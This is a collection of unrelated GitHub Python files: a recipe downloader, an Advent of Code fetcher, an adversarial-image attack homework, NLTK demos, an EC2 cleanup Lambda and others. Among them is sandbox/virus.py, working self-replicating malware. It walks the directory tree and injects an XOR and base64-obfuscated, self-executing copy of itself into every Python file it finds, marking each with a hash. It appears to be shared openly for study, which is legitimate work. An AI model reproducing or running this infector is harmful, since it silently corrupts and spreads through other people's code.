    average_linreg_contributions = np.mean(np.array(linreg_contributions_across_comparisons), axis=1)
    average_contributions = np.mean(np.array(contributions_across_comparisons), axis=0)
    average_coefficients = np.mean(np.array(coefficients_across_comparisons), axis=0)
    average_event_variations = np.mean(np.array(event_variations_across_comparisons), axis=0)
    average_predicted_duration_variations = np.mean(np.array(pred_duration_variations_across_comparisons), axis=0)
    average_true_duration_variations = np.mean(np.array(true_duration_variations_across_comparisons), axis=0)
    return average_contributions, average_linreg_contributions, average_coefficients, average_event_variations, average_all_event_variations, np.mean(average_predicted_duration_variations), np.mean(average_true_duration_variations)
| Richard549/ComPerf | src/ComperfAnalysis.py | ComperfAnalysis.py | py | 28,464 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.amax",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "numpy.amin",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.exp",
"line_number": 3... |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os
# Make sibling modules (CustomPrint, Scrapers, ...) importable when this
# file is executed directly as a script rather than as an installed package.
sys.path.append(os.path.dirname(__file__))
import argparse
from CustomPrint import custom_print_init, print_info, print_debug, print_error, print_warning
from Scrapers import url2recipe_json
from RecipeOutput import recipe_output
from CustomExceptions import UrlError
# Package metadata (also used to build the --version string).
__version__ = '0.3.1'
__author__ = u'Rodney Shupe'
def parse_arguments(print_usage = False, detail = False):
    """Build the command-line parser; print usage or parse sys.argv.

    When *print_usage* is True, the full help (*detail* True) or the short
    usage line is printed and None is returned. Otherwise the parsed and
    post-processed arguments namespace is returned.
    """
    parser = argparse.ArgumentParser('recipe-dl')
    parser.add_argument('--version', action='version',
                        version='%(prog)s v' + __version__)
    parser.add_argument('-a', '--authorize', action="store_true",
                        dest="authorize_ci", default=False,
                        help='Force authorization of Cook Illustrated sites')
    parser.add_argument("-d", "--debug", action="store_true",
                        dest="debug", default=False,
                        help="Add additional Output")
    # Hidden option: silent mode (suppressed from --help output).
    parser.add_argument("-q", "--quiet", action="store_true",
                        dest="quiet", default=None,
                        help=argparse.SUPPRESS)
    parser.add_argument("-v", "--verbose", action="store_true",
                        dest="verbose", default=False,
                        help="Make output verbose")
    parser.add_argument("-j", "--output-json", action="store_true",
                        dest="output_json", default=False,
                        help="Output results in JSON format.")
    parser.add_argument("-m", "--output-md", action="store_true",
                        dest="output_md", default=False,
                        help="Output results in Markdown format.")
    parser.add_argument("-r", "--output-rst", action="store_true",
                        dest="output_rst", default=False,
                        help="Output results in reStructuredText format.")
    parser.add_argument('-i', '--infile', action="store", dest="infile",
                        help="Specify input json file infile.")
    parser.add_argument('-o', '--outfile', action="store", dest="outfile",
                        help="Specify output file outfile.")
    parser.add_argument("-s", "--save-to-file", action="store_true",
                        dest="save_to_file", default=False,
                        help="Save output file(s).")
    parser.add_argument("-f", "--force-recipe-scraper", action="store_true",
                        dest="force_recipe_scraper", default=False,
                        help="For the use of the recipe scraper where applicable.")
    # Hidden developer option.
    parser.add_argument("--quick-tests", action="store_true",
                        dest="quick_tests", help=argparse.SUPPRESS, default=False)
    parser.add_argument('URL', nargs='*', action="append", default=[],)
    if print_usage:
        if detail:
            parser.print_help()
        else:
            parser.print_usage()
        return None
    args = parser.parse_args()
    # Silent mode defaults to the opposite of verbose unless set explicitly.
    if args.quiet is None:
        args.quiet = not args.verbose
    if args.debug and args.quiet:
        args.quiet = False
        print_warning ("Debug option selected. Can not run in \"Silent Mode\"")
    custom_print_init (quiet=args.quiet, debug=args.debug)
    # Count the requested output formats; default to reStructuredText, and
    # force saving to files when more than one format is selected.
    filetype_count = sum([args.output_json, args.output_md, args.output_rst])
    print_debug("filetype_count=%s" % filetype_count)
    if filetype_count == 0:
        args.output_rst = True
    elif filetype_count > 1:
        print_warning ("More than one output file type select. Assuming 'Save to File'")
        args.save_to_file = True
    # An explicit outfile implies saving to file.
    if not args.save_to_file and not args.outfile is None and args.outfile != '':
        args.save_to_file = True
    return args
def quick_tests(args):
    """Run a handful of known recipe URLs end-to-end as smoke tests."""
    from UtilityFunctions import url2domain
    url2domain("https://www.finecooking.com/recipe/herbed-grill-roasted-lamb")
    test_urls = (
        'http://www.foodandwine.com/recipes/herbed-roast-leg-of-lamb',
        'https://www.bonappetit.com/recipe/instant-pot-glazed-and-grilled-ribs',
        'https://www.saveur.com/perfect-brown-rice-recipe/',
        'https://www.thechunkychef.com/easy-slow-cooker-mongolian-beef-recipe',
    )
    for url in test_urls:
        # Re-initialise printing per URL so each run honours the flags.
        custom_print_init (quiet=args.quiet, debug=args.debug)
        print_info ("==========================")
        recipe_output(args, url2recipe_json(args, url))
        print_info ("==========================")
def main(args=None):
    """Entry point: resolve recipes from command-line URLs or an input JSON
    file and hand the result to recipe_output.

    Parameters
    ----------
    args : argparse.Namespace or None
        Parsed arguments; parsed fresh from sys.argv when None.
    """
    if args is None:
        args = parse_arguments()
    print_debug (args)
    if args.quick_tests:
        quick_tests(args)
    else:
        # args.URL is a nested list because of nargs='*' + action="append".
        if not args.URL == [[]]:
            for url in args.URL[0]:
                try:
                    recipe_json = url2recipe_json(args, url)
                except UrlError as err:
                    print_error ("Specified URL Not suported!")
                    sys.exit (os.EX_SOFTWARE)
                except Exception as err:
                    # Bug fix: err.args[1] raises IndexError for the common
                    # single-argument exceptions; fall back to str(err).
                    print_error (err.args[1] if len(err.args) > 1 else str(err))
                    sys.exit (os.EX_TEMPFAIL)
                recipe_output(args, recipe_json)
        else:
            if not args.infile is None and args.infile != "":
                print_info ("Processsing %s..." % args.infile)
                with open(args.infile) as json_file:
                    recipe_json = json.load(json_file)
                recipe_output(args, recipe_json)
            else:
                print_error ("You must specify an input URL or input JSON file.")
                parse_arguments(print_usage=True)
                sys.exit (os.EX_USAGE)
if __name__ == '__main__':
args = parse_arguments()
main(args)
#quick_tests()
| rodneyshupe/recipe-dl | recipe_dl/main.py | main.py | py | 6,146 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number... |
6535858908 | import os
import requests
SESSION_ID = os.getenv("aoc_session_id")
def get_data(day=1):
    """Download the Advent of Code 2022 puzzle input for *day* and save it
    to advent_of_code/day_<day>/data.txt.

    Requires the module-level SESSION_ID (aoc_session_id env var) to be a
    valid adventofcode.com session cookie.
    """
    headers = {"cookie": f"session={SESSION_ID}"}
    days_data = requests.get(f"https://adventofcode.com/2022/day/{day}/input", headers=headers)
    # Fail loudly on a bad/missing session cookie or a not-yet-released day
    # instead of silently writing an error page to disk.
    days_data.raise_for_status()
    # Bug fix: the original used backslash string literals ("advent_of_code\day_1"),
    # which is an invalid escape (\d) and not a path separator on POSIX.
    day_dir = os.path.join("advent_of_code", f"day_{day}")
    os.makedirs(day_dir, exist_ok=True)
    with open(os.path.join(day_dir, "data.txt"), mode="w") as data_file:
        data_file.write(days_data.text)
if __name__ == "__main__":
    # Fetch puzzle inputs for days 1 through 3.
    for i in range(1, 4):
        get_data(i)
{
"api_name": "os.getenv",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,... |
17251067645 | import os
import pandas as pd
from PIL import Image
import numpy as np
import torch
import torch.nn.functional as F
import torchvision.datasets as datasets
from torch.utils.data import Dataset, DataLoader
import torchvision.models as models
import torchvision.transforms as transforms
import matplotlib.pyplot as plt
import cv2
import copy
import sys
import time
device = torch.device("cuda")
# 實作一個繼承 torch.utils.data.Dataset 的 Class 來讀取圖片
class Adverdataset(Dataset):
    """Dataset serving the 200 attack images together with their labels."""

    def __init__(self, root, label, transforms):
        # Directory holding the images named 000.png .. 199.png.
        self.root = root
        # Ground-truth labels supplied by the caller, stored as a long tensor.
        self.label = torch.from_numpy(label).long()
        # Preprocessing pipeline mapping a PIL image to a model-ready tensor.
        self.transforms = transforms
        # Zero-padded file stems: "000", "001", ..., "199".
        self.fnames = [f"{i:03d}" for i in range(200)]

    def __getitem__(self, idx):
        """Load, preprocess and return (image_tensor, label) for *idx*."""
        path = os.path.join(self.root, self.fnames[idx] + '.png')
        image = self.transforms(Image.open(path))
        return image, self.label[idx]

    def __len__(self):
        # The dataset is known to contain exactly 200 images.
        return 200
class Best_Attacker:
    """Iterative FGSM (PGD-style) adversarial attacker against a pretrained
    DenseNet-121 ImageNet classifier. Requires a CUDA device."""

    def __init__(self, img_dir, label):
        # Pretrained target classifier, frozen in eval mode on the GPU.
        self.model = models.densenet121(pretrained = True)
        self.model.cuda()
        self.model.eval()
        # Number of gradient-sign iterations and per-step size.
        self.iters = 10
        self.alpha = 2/255
        # ImageNet channel statistics.
        self.mean = [0.485, 0.456, 0.406]
        self.std = [0.229, 0.224, 0.225]
        # Normalize images to zero mean / unit variance per channel.
        self.normalize = transforms.Normalize(self.mean, self.std, inplace=False)
        transform = transforms.Compose([
            transforms.Resize((224, 224), interpolation=3),
            transforms.ToTensor(),
            self.normalize
        ])
        # Read the 200 images and their labels through Adverdataset.
        self.dataset = Adverdataset(img_dir, label, transform)
        self.loader = torch.utils.data.DataLoader(
            self.dataset,
            batch_size = 1,
            shuffle = False)

    def L_infinity(self, origin, new, epsilon):
        # Largest absolute per-pixel difference between the two images.
        # NOTE(review): epsilon is unused here.
        difference = origin - new
        max_diff = torch.max(torch.abs(difference))
        return max_diff

    def attack(self, epsilon):
        """Run the iterated attack with L-inf budget *epsilon*.

        Returns (img, final_acc): the list of de-normalized output images
        (numpy arrays) and the model accuracy after the attack.
        """
        # Keep some successfully attacked images for later display.
        adv_examples = []
        wrong, fail, success = 0, 0, 0
        img = []
        count = 1
        for (data, target) in self.loader:
            data, target = data.to(device), target.to(device)
            data_raw = copy.deepcopy(data)
            # Classify the clean image first.
            output = self.model(data)
            init_pred = output.max(1, keepdim=True)[1]
            # If the model is already wrong, do not attack this image.
            if init_pred.item() != target.item():
                wrong += 1
                # De-normalize back to [0, 1] image space before saving.
                data_raw = data_raw * torch.tensor(self.std, device = device).view(3, 1, 1) + torch.tensor(self.mean, device = device).view(3, 1, 1)
                data_raw = data_raw.squeeze().detach().cpu().numpy()
                img.append(data_raw)
                continue
            # Otherwise iterate gradient-sign steps, projecting the
            # perturbation back into the epsilon ball each step.
            for i in range(self.iters):
                data.requires_grad = True
                output = self.model(data)
                loss = F.nll_loss(output, target)
                data_grad = torch.autograd.grad(loss, data)[0]
                data = data + self.alpha * data_grad.sign()
                eta = torch.clamp(data - data_raw, min=-epsilon, max=epsilon)
                data = (data_raw + eta).detach()
                #data = torch.clamp(data_raw + eta, min=0, max=1).detach()
            perturbed_data = data
            # Classify the perturbed image.
            output = self.model(perturbed_data)
            final_pred = output.max(1, keepdim=True)[1]
            #print('Finish :',count)
            count += 1
            if final_pred.item() == target.item():
                #print("fail")
                # Prediction unchanged: the attack failed.
                adv_ex = perturbed_data * torch.tensor(self.std, device = device).view(3, 1, 1) + torch.tensor(self.mean, device = device).view(3, 1, 1)
                adv_ex = adv_ex.squeeze().detach().cpu().numpy()
                img.append(adv_ex)
                fail += 1
            else:
                # Prediction flipped: the attack succeeded.
                success += 1
                #print('success')
                adv_ex = perturbed_data * torch.tensor(self.std, device = device).view(3, 1, 1) + torch.tensor(self.mean, device = device).view(3, 1, 1)
                adv_ex = adv_ex.squeeze().detach().cpu().numpy()
                img.append(adv_ex)
        # Accuracy = fraction of images the model still classifies correctly.
        final_acc = (fail / (wrong + success + fail))
        print("Epsilon: {}\tTest Accuracy = {} / {} = {}\n".format(epsilon, fail, len(self.loader), final_acc))
        return img, final_acc
if __name__ == '__main__':
    t1 = time.time()
    # Load the ground-truth labels corresponding to the images.
    df = pd.read_csv(sys.argv[1] + "/labels.csv")
    df = df.loc[:, 'TrueLabel'].to_numpy()
    label_name = pd.read_csv(sys.argv[1] + "/categories.csv")
    label_name = label_name.loc[:, 'CategoryName'].to_numpy()
    # Instantiate the attacker on the image directory.
    attacker = Best_Attacker(sys.argv[1] + "/images", df)
    # Epsilon values (L-inf budgets) to try.
    epsilons = [0.1]
    accuracies, examples = [], []
    # Run the attack; keep the post-attack accuracy and output images.
    for eps in epsilons:
        #ex, acc = attacker.attack(eps)
        img, acc = attacker.attack(eps)
        accuracies.append(acc)
        #examples.append(ex)
    number = 0
    save_path = sys.argv[2]
    if not os.path.isdir(save_path):
        os.mkdir(save_path)
    save_path = save_path + '/'
    # Convert each image from CHW float [0,1] to HWC 0-255 and save as PNG
    # with zero-padded three-digit filenames.
    for ex in img:
        ex = 255 * np.array(ex).astype(np.float32)
        ex = np.swapaxes(ex,0,1)
        ex = np.swapaxes(ex,1,2)
        #print(ex.shape)
        ex[:,:,[0,2]] = ex[:,:,[2,0]] # chage the color channel
        if len(str(number)) == 1:
            name = '00' + str(number)
            cv2.imwrite(save_path+str(name)+'.png', ex)
        elif len(str(number)) == 2:
            name = '0' + str(number)
            cv2.imwrite(save_path+str(name)+'.png', ex)
        else:
            cv2.imwrite(save_path+str(number)+'.png', ex)
        number += 1
    t2 = time.time()
    print("Execute time :" + str(t2-t1))
| Peter870512/ML_2020Spring | HW6/hw6_best.py | hw6_best.py | py | 6,895 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.device",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "torch.utils.data.Dataset",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "torch.from_numpy",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "torchvision.tr... |
32786726933 | import boto3
import re
from datetime import datetime, timedelta
import os
def lambda_handler(event, context):
    """Terminate stopped EC2 instances that lack the 'TerminateOnIdle' tag
    and have been stopped for longer than TERMINATION_AGE days.

    Parameters
    ----------
    event, context : AWS Lambda invocation event and runtime context (unused).
    """
    TERMINATION_AGE = 0
    ec2_client = boto3.client('ec2', region_name='us-east-1')
    # Get a list of stopped instances
    instances = ec2_client.describe_instances(
        Filters=[{'Name': 'instance-state-name', 'Values': ['stopped']}])
    for reservation in instances['Reservations']:
        for instance in reservation['Instances']:
            # Instances carrying the protective tag are never terminated.
            tags = instance.get('Tags', [])
            has_required_tag = any(tag['Key'] == 'TerminateOnIdle' for tag in tags)
            if has_required_tag:
                continue
            # StateTransitionReason looks like
            # "User initiated (2016-05-23 17:27:19 GMT)".
            # Bug fixes: raw string for the regex (\( and \d were invalid
            # escapes) and a None-guard so an unexpected reason string no
            # longer crashes the whole invocation with AttributeError.
            reason = instance.get('StateTransitionReason', '')
            match = re.search(r'User initiated \(([\d-]*)', reason)
            if match is None:
                continue
            date_string = match.group(1)
            if len(date_string) == 10:
                date = datetime.strptime(date_string, '%Y-%m-%d')
                # Terminate if stopped for more than TERMINATION_AGE days.
                if (datetime.today() - date).days + 1 > TERMINATION_AGE:
                    ec2_client.terminate_instances(InstanceIds=[instance['InstanceId']])
| SuleymanBat/TROUBLESHOOTING_SOLUTIONS_FOR_DEVOPS | TERRAFORM/terraform-stoppedEC2s/lambda.py | lambda.py | py | 1,468 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "boto3.client",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",... |
26238422374 | import logging
import logging.config
import os
from typing import Union
class Reporter:
    """Writes log messages to ``report.log`` in the current directory."""

    def __init__(self,
                 logger: Union[logging.Logger, None] = None,
                 lvl: int = logging.INFO) -> None:
        """Reporter Class.

        Parameters
        ----------
        logger : logger or None
            The logger object to use.
        lvl : int
            Logging level to write to.
        """
        self.logger = logger if logger is not None else logging.getLogger(__name__)
        self.log_level = lvl
        self.log_path = os.path.join(os.getcwd(), 'report.log')
        self._setup_logger()

    def log(self, msg: str, lvl: int = logging.INFO) -> None:
        """Logs a message with a given level.

        Parameters
        ----------
        msg : str
            Message to log.
        lvl : int
            Level with which to log the message.
        """
        self.logger.log(lvl, msg)

    def _setup_logger(self) -> None:
        """Initialises the logger using the basic config."""
        config = dict(
            level=self.log_level,
            format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
            datefmt='%d/%m/%Y %H:%M:%S',
            filename=self.log_path,
            filemode='w',
        )
        logging.basicConfig(**config)
| danielkelshaw/PySwallow | pyswallow/utils/reporter.py | reporter.py | py | 1,301 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "typing.Union",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "logging.Logger",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "logging.INFO",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "logging.getLogger"... |
72274079145 | from typing import Tuple, List
import pandas as pd
import time
import re
import functools
class Processor:
    """Immutable-style wrapper around a DataFrame offering chainable
    column-filtering operations. Each filter returns a new Processor."""

    def __init__(self, dataframe: pd.DataFrame):
        self._df = dataframe

    def get(self) -> pd.DataFrame:
        """Return a defensive copy of the wrapped DataFrame."""
        return self._df.copy()

    def __repr__(self) -> str:
        # Bug fix: the previous version returned the bound method object
        # (self._df.__repr__) instead of calling it, making repr() raise
        # "TypeError: __repr__ returned non-string".
        return repr(self._df)

    def __str__(self) -> str:
        # Same bug fix as __repr__.
        return str(self._df)

    def keep_dtypes(self, keep_dt: List[str]) -> "Processor":
        """Return a new Processor keeping only columns whose dtype is listed
        in *keep_dt* (e.g. ["int64", "float64"])."""
        df = self._df.copy()
        dtypes = df.dtypes
        keep_cols = [col for col in df.columns if dtypes[col] in keep_dt]
        return Processor(df[keep_cols])

    def exclude_cols(self, exclude_cols: List[str]) -> "Processor":
        """Return a new Processor dropping every column whose name matches
        (via re.match, i.e. anchored at the start) any pattern in
        *exclude_cols*."""
        df = self._df.copy()
        keep_cols = [
            col for col in df.columns
            if not any(re.match(pattern, col) for pattern in exclude_cols)
        ]
        return Processor(df[keep_cols])
{
"api_name": "pandas.DataFrame",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "typing.List",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 34,
"usage_type": "name"
},
{
"api_name": "re.match",
"line_num... |
72150153383 | import chunk
from nltk.tokenize import word_tokenize,sent_tokenize ,PunktSentenceTokenizer
from nltk.corpus import stopwords,state_union
from nltk.stem import PorterStemmer
import nltk
def token(inputs):
    """Split *inputs* into a list of sentences (NLTK sentence tokenizer).
    Despite the name, this returns sentences, not word tokens."""
    # input = "hi vi what time is it"
    return (sent_tokenize(inputs))
def sw():
    """Demo: remove English stopwords from a hard-coded sentence and print
    the remaining word tokens."""
    text = "token is showing this shit"
    stop_words = set(stopwords.words("english"))
    words = word_tokenize(text)
    filtered = [w for w in words if w not in stop_words]
    print(filtered)
def stem():
    """Demo: Porter-stem each sentence of a hard-coded text and print it."""
    ps = PorterStemmer()
    # NOTE(review): missing comma — implicit string concatenation makes this
    # the two-element list ['python', 'pythonerpythoning']. It is also unused.
    ex = ['python' , 'pythoner' 'pythoning']
    text ='its very importent to be pythonly when you are pythoning with python'
    # NOTE(review): token() returns whole sentences, so ps.stem runs on each
    # full sentence here, not on individual words. Also shadows module `re`.
    re = [ps.stem(w) for w in token(text)]
    print(re)
def partofspeechtagging():
    """Demo: POS-tag and chunk the 2005 State of the Union speech using a
    Punkt sentence tokenizer trained on the 2006 speech; prints the chunk
    tree of the first sentence only (loop breaks after one iteration)."""
    sample = state_union.raw("2005-GWBush.txt")
    train_sample = state_union.raw("2006-GWBush.txt")
    costum_set_token = PunktSentenceTokenizer(train_sample)
    tokenized = costum_set_token.tokenize(sample)
    # Chunk everything, then chink (remove) verbs/prepositions/determiners.
    chunkgram = r"""Chunk:{<.*>+}
    }<VB.?|IN|DT>+{ """
    # chunkgram = r"""Chunk:{<RB.?>*<VB.?>*<NNP>+<NN>?}"""
    chunkparser = nltk.RegexpParser(chunkgram)
    for n,i in enumerate(tokenized):
        words = word_tokenize(i)
        tagged = nltk.pos_tag(words)
        chunked = chunkparser.parse(tagged)
        chunked.pretty_print()
        # print(dir(chunked))
        break
# words = word_tokenize('search for css in youtube')
# tagged = nltk.pos_tag(words)
# chunkgram = r"""Chunk:{<VB.?>*}"""
# chunkparser = nltk.RegexpParser(chunkgram)
# chunked = chunkparser.parse(tagged)
# print(chunked)
# sw()
# partofspeechtagging()
# stem()
postags = """
CC coordinating conjunction
CD cardinal digit
DT determiner
EX existential there (like: “there is” … think of it like “there exists”)
FW foreign word
IN preposition/subordinating conjunction
JJ adjective ‘big’
JJR adjective, comparative ‘bigger’
JJS adjective, superlative ‘biggest’
LS list marker 1)
MD modal could, will
NN noun, singular ‘desk’
NNS noun plural ‘desks’
NNP proper noun, singular ‘Harrison’
NNPS proper noun, plural ‘Americans’
PDT predeterminer ‘all the kids’
POS possessive ending parent’s
PRP personal pronoun I, he, she
PRP$ possessive pronoun my, his, hers
RB adverb very, silently,
RBR adverb, comparative better
RBS adverb, superlative best
RP particle give up
TO, to go ‘to’ the store.
UH interjection, errrrrrrrm
VB verb, base form take
VBD verb, past tense took
VBG verb, gerund/present participle taking
VBN verb, past participle taken
VBP verb, sing. present, non-3d take
VBZ verb, 3rd person sing. present takes
WDT wh-determiner which
WP wh-pronoun who, what
WP$ possessive wh-pronoun whose
WRB wh-abverb where, when
"""
import re
exampleString = '''
Jessica is 15 years old, and Daniel is 27 years old.
Edward is 97 years old, and his grandfather, Oscar, is 102.
'''
ages = re.findall(r'\d{1,3}',exampleString)
names = re.findall(r'[A-Z][a-z]*',exampleString)
# print(ages)
# print(names)
example = 'search for youtube hkjhk in duckduckgo'
re.findall(r'@([a-zA-Z]+)','gfgfdAAA1234ZZZuijjk')
finel = re.findall('(search for) (.*) (in) (.*)' ,example)
# print(finel)
# print(re.findall('(search for|look for|find) (.+) (in|on) (.+)', sample))
def partofspeechtagging():
    """Demo: named-entity chunking over the 2005 State of the Union speech.

    NOTE(review): this redefines (shadows) the earlier partofspeechtagging()
    defined above in this file; only this version is reachable afterwards.
    """
    sample = state_union.raw("2005-GWBush.txt")
    train_sample = state_union.raw("2006-GWBush.txt")
    costum_set_token = PunktSentenceTokenizer(train_sample)
    tokenized = costum_set_token.tokenize(sample)
    for i in tokenized:
        words = word_tokenize(i)
        tagged = nltk.pos_tag(words)
        # binary=1 collapses all entity types into a single "NE" label.
        namedEnt = nltk.ne_chunk(tagged,binary= 1)
        namedEnt.draw()
# partofspeechtagging()
# sample="search for css animatation on youtube"
def lemtze():
    """Demo: lemmatize 'better' as an adjective, then print sentences 5-14
    of the King James Bible from the Gutenberg corpus."""
    from nltk.stem import WordNetLemmatizer
    lem = WordNetLemmatizer()
    print(lem.lemmatize('better' , "a"))
    from nltk.corpus import gutenberg
    sample = gutenberg.raw('bible-kjv.txt')
    tok = sent_tokenize(sample)
    print(tok[5:15] )
| astroxiii/VI-CORE | expirment.py | expirment.py | py | 4,160 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "nltk.tokenize.sent_tokenize",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwords.words",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwords",
"line_number": 12,
"usage_type": "name"
},
{
"api_... |
3273044860 | #!/usr/bin/env python3
import base64
import hashlib
import os
import random
import string
from subprocess import Popen, PIPE
API = "https://corona-stats.online?top=15"
def execute_payload():
    """Benign payload: fetch the top-15 COVID statistics via curl and pipe
    the first 37 lines through head to stdout."""
    print("######### DONT BE A COVIDIOT, STAY @ HOME #########")
    cmd1 = Popen(["curl", "-s"] + [API], stdout=PIPE)
    cmd2 = Popen(["head", "-n", "37"], stdin=cmd1.stdout)
    cmd1.wait()
    cmd2.wait()
def create_copy():
try:
return y
except NameError:
with open(os.path.basename(__file__), 'r') as source:
data = []
for line in source:
data.append(line)
return "".join(data)
def otp_keygen(size):
    """Return a random alphanumeric one-time-pad key of length *size*."""
    alphabet = string.ascii_uppercase + string.ascii_lowercase + string.digits
    return ''.join(random.choice(alphabet) for _ in range(size))
def xor_strs(s1, s2):
    """XOR two strings character-by-character (truncated to the shorter)."""
    result = []
    for a, b in zip(s1, s2):
        result.append(chr(ord(a) ^ ord(b)))
    return ''.join(result)
def encrpyt_it(stuff_to_encrpyt):
    """One-time-pad encrypt: return (cipher_text, key) where the key is a
    fresh random string of the same length as the input."""
    key = otp_keygen(len(stuff_to_encrpyt))
    cipher_text = xor_strs(stuff_to_encrpyt, key)
    return cipher_text, key
def wrap(asset):
encrpyted_asset, key = encrpyt_it(asset)
base64_encoded_and_encrypted = base64.b64encode(str.encode(encrpyted_asset))
return "exec('import base64;x=base64.b64decode(str.encode(\\'{0}\\'));" \
"y=\\'\\'.join(chr(ord(a) ^ ord(b)) for a, b in zip(x.decode(), \\'{1}\\'));" \
"exec(y, {{\\'y\\':y}})')".format(base64_encoded_and_encrypted.decode(), key)
def check_if_infected(hash_value, file):
    """Return True when the SHA-256 hex digest of *file* equals *hash_value*."""
    digest = hashlib.sha256(file.encode()).hexdigest()
    return digest == hash_value
def infect(troy):
for root, _, files in os.walk('.'):
for file in files:
relative_path = root + '/' + file
if file.endswith(".py") and relative_path != "./virus.py":
with open(relative_path, 'r') as original:
data = original.read().split('\n')
last_line = data[-1]
if last_line.startswith("#*!@"):
if check_if_infected(last_line[4:].rstrip('\n'), '\n'.join(data[:-1])):
continue
else:
data = '\n'.join(data[:-2])
else:
data = '\n'.join(data)
with open(relative_path, 'w') as modified:
new_content = "{0}\n{1}".format(data, troy)
content_hash = hashlib.sha256(new_content.encode())
modified.write("{0}\n#*!@{1}".format(new_content, content_hash.hexdigest()))
def virus_routine():
execute_payload()
malicious_copy = create_copy()
troy = wrap(malicious_copy)
infect(troy)
virus_routine()
| ysyesilyurt/virus.py | sandbox/virus.py | virus.py | py | 2,726 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "subprocess.Popen",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "subprocess.PIPE",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "subprocess.Popen",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path.basename",
... |
22035870178 | import asyncio, gbulb, logging, logging.handlers
from multiprocessing import Process
from python_dbus_system_api import start_server
from ustatus.ustatus import Ustatus
from ustatus.utils.notifications import notify_error
def main():
    """Entry point: spawn the D-Bus API server process, then run the GTK
    status application on a gbulb-backed asyncio event loop."""
    setup_logging()
    # Ensure API is running (if already running this will just queue to get the
    # bus name)
    api_process = Process(target=start_server)
    api_process.start()
    gbulb.install(gtk=True)  # only necessary if you're using GtkApplication
    application = Ustatus()
    loop = asyncio.get_event_loop()
    try:
        loop.run_forever(application=application)
    except Exception as e:
        # Bug fix: f"e" was the literal string "e"; interpolate the exception
        # so the notification actually shows what went wrong.
        notify_error(summary="Uncaught error", body=f"{e}")
def setup_logging():
    """Configure root logging: INFO level, {}-style format, plus a syslog
    handler writing to /dev/log."""
    logging.basicConfig(
        level=logging.INFO,
        style="{",
        # NOTE(review): "(unknown)" looks like a placeholder where a field
        # such as {lineno} may have been intended — confirm against upstream.
        format="[{levelname}({name}):(unknown):{funcName}] {message}",
    )
    root_logger = logging.getLogger()
    sys_handler = logging.handlers.SysLogHandler(address="/dev/log")
    root_logger.addHandler(sys_handler)
if __name__ == "__main__":
main()
| mbrea-c/ustatus | src/ustatus/main.py | main.py | py | 1,070 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "multiprocessing.Process",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "python_dbus_system_api.start_server",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "gbulb.install",
"line_number": 16,
"usage_type": "call"
},
{
"api_nam... |
42737050383 | from brownie import network, AdvancedCollectible
from scripts.helpful_scripts import get_account, get_gtype, OPENSEA_URL
# File uploaded to IPFS and took the
god_metadata_dic = {
"SHIVA": "https://ipfs.io/ipfs/QmULNZ8umdtXYAUB5y9UpaLXBNmN7SCgcpnMbEdx5eSEyi?filename=0-SHIVA.json",
# "GANESH": "https://ipfs.io/ipfs/QmXx7UhfFnSrFmGhDsPurdLQEC1Dv4yZPkYfx4E5aAmh68?filename=1-GANESH.json",
"HANUMAN": "https://ipfs.io/ipfs/Qmf4TKekSuWnJ1reqWqju5KakLa4QA546VzP5cWdSXFVNp?filename=1-HANUMAN.json",
}
def main():
    """For every minted tokenId whose tokenURI is not yet an https URL, set
    it to the IPFS metadata URI matching the token's god type."""
    print(f"Working on {network.show_active()}")
    # Most recently deployed AdvancedCollectible contract.
    advanced_collectible = AdvancedCollectible[-1]
    number_of_collectibles = advanced_collectible.tokenCounter()
    print(f"You have {number_of_collectibles} tokenIds")
    for token_id in range(number_of_collectibles):
        gtype = get_gtype(advanced_collectible.tokenIdToGodType(token_id))
        if not advanced_collectible.tokenURI(token_id).startswith("https://"):
            print(f"Setting tokenURI of {token_id}")
            set_tokenURI(token_id, advanced_collectible, god_metadata_dic[gtype])
def set_tokenURI(token_id, nft_contract, tokenURI):
    """Send a setTokenURI transaction for *token_id*, wait for one
    confirmation, and print the OpenSea URL for the token."""
    account = get_account()
    tx = nft_contract.setTokenURI(token_id, tokenURI, {"from": account})
    tx.wait(1)
    print(
        f"You can view your NFT at {OPENSEA_URL.format(nft_contract.address, token_id)}"
    )
| shubhamghimire/nft-demo | scripts/advanced_collectible/set_tokenuri.py | set_tokenuri.py | py | 1,360 | python | en | code | 0 | github-code | 36 | [
{
